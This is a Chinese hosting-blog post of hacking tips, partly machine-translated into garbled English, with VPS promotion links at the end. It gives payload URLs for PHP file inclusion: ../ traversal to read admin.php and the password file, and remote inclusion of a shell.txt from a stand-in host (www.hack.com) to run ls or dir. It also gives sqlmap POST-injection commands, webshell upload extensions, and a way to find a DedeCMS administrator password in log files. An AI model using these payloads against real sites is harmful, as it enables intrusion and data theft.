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如果PHP使用了文件包含的方法则用 www.xxx.com/index.php?page=./admin.php就可以读取当前路径下admin.php文件的内容了,也可以用../跳转到其他目录去查看其
它文件 Linux下如果路径对则可以读出密码文件若不对可以用../不断探测Linux主机下 www.xxx.com/index.php?page=http://www.hack.com/shell.txt?shell=ls
-a 可以遍历当前目录下的所有文件,win下提交www.xxx.com/index.php?
page=http://www.hack.com/shell.txt?shell=dir 同样遍历文件
包,抓到的包存在txt文件中,运行sqlmap,sqlmap.py -r 文件路径sqlmap,sqlmap.py -r 文件路径 --current-db 读取当前数据库
织梦cms 配置文件地址 data/admin/ 下,其中的ver.txt 存放的是系统的版本时间
The strip_tags() and htmlspecialchars() provided by PHP can be used for cross site protection
HTML and PHP are transformed, and the variables in update and insert are transformed with the above two functions
If PHP is supposed to be on win, it can parse files in the format of CER, ASA, ASPX, asax, ASPX and CDX
On Linux and UNIX, files of PL, PHP3 and format can be parsed (pl: perl language)
Php2, PHP, Inc, pwml, ASA, CER use upload webshell
If PHP uses the method contained in the file, you can use www.xxx.com/index.php? Page =. / admin.php to read the content of the admin.php file in the current path, or you can use.. / to jump to other directories to view it
Under Linux, if the path is correct, you can read the password file. If not, you can use.. / to continuously probe the Linux host www.xxx.com/index.php? Page = http://www.hack.com/shell.txt? Shell = ls
-A can traverse all files in the current directory, and submit www.xxx.com/index.php under win?
Page = http://www.hack.com/shell.txt? Shell = dir also traverses files
SQL map post injection new learning method: find the place of form submission in the website, fill in information submission, grasp
Package. The caught package exists in the txt file. Run sqlmap, sqlmap.py-r file path sqlmap, sqlmap.py-r file path -- current DB to read the current database
Under the address data / admin / of Zhimeng CMS configuration file, ver.txt stores the version time of the system
, system file time, find the log file address of the corresponding version. You can find the administrator's password and find the backstage
To log in.
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- #实时更新#最新2021年主机商双十一活动汇总,国内外VPS主机商双11促销优惠活动汇总,海外免备案VPS云服务器/独立服务器超大带宽不限流量双11活动
- ZJI,双十一特价优惠,自营免备案香港独立服务器/独服一律55折,香港阿里云专线/BGP,Intel E5-2630L处理器16G内存5Mbps带宽CN2+BGP阿里云专线,412元/月
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本文由主机参考刊发,转载请注明:2016.5.19***经验总结 https://zhujicankao.com/12483.html